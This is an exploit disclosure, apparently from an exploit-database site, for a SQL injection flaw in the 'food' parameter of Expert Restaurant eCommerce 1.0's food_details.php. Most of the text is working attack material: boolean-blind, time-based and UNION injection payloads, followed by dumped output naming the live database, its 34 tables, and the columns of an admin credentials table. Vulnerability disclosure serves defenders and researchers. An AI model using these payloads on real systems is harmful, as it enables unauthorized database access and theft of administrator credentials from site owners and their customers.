Authored by CraCkEr

Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.

β”Œβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚β”‚ C r a C k E r β”Œβ”˜
β”Œβ”˜ T H E C R A C K O F E T E R N A L M I G H T β”‚β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜β”˜

β”Œβ”€β”€β”€β”€ From The Ashes and Dust Rises An Unimaginable crack.... ────┐
β”Œβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”Œβ”˜ [ Vulnerability ] β”Œβ”˜
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜β”˜
: Author : CraCkEr :
β”‚ Website : https://www.codester.com/items/20872/ β”‚
β”‚ Vendor : Expert IT Solution β”‚
β”‚ Software : Expert Restaurant eCommerce 1.0 β”‚
β”‚ Vuln Type: SQL Injection β”‚
β”‚ Impact : Database Access β”‚
β”‚ β”‚
│────────────────────────────────────────────────────────────────────────────────────────│
β”‚ β”Œβ”˜
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜β”˜
: :
β”‚ Release Notes: β”‚
β”‚ ═════════════ β”‚
β”‚ β”‚
β”‚ SQL injection attacks can allow unauthorized access to sensitive data, modification of β”‚
β”‚ data and crash the application or make it unavailable, leading to lost revenue and β”‚
β”‚ damage to a company's reputation. β”‚
β”‚ β”‚
β”Œβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”Œβ”˜ β”Œβ”˜
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜β”˜

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

β”Œβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”Œβ”˜ Β© CraCkEr 2023 β”Œβ”˜
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜β”˜

Path: /food_details.php

https://www.website/food_details.php?food=[SQLI]


GET parameter 'food' is vulnerable to SQL Injection

---
Parameter: food (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV

Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---


[+] Starting the Attack

fetching current database
current database: 'sagor_****_restu'


fetching tables

[34 tables]
+--------------------------+
| add_to_cart_view |
| admin_url |
| contact_manage |
| currencies |
| customer_info |
| delivery_live_status |
| expense_manage |
| food_category |
| food_dish_manage |
| food_dish_vari_man |
| food_field_variant |
| food_field_variant_value |
| food_order_confirm |
| food_review |
| food_sub_category |
| food_tag |
| gallery_manage |
| hall_manage |
| income_manage |
| kitchen_live_sta |
| menu_manage |
| opening_manage |
| order_accounts |
| order_other_address |
| page_manage |
| payment_gateway |
| shipping_charge |
| site_setting |
| slider_manage |
| social_manage |
| sup_ad_log |
| table_book |
| table_manage |
| team_manage |
+--------------------------+


fetching columns for table 'sup_ad_log'

[5 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| status | varchar(100) |
| id | int(11) |
| sup_admin_name | varchar(100) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+----------------+--------------+


[-] Done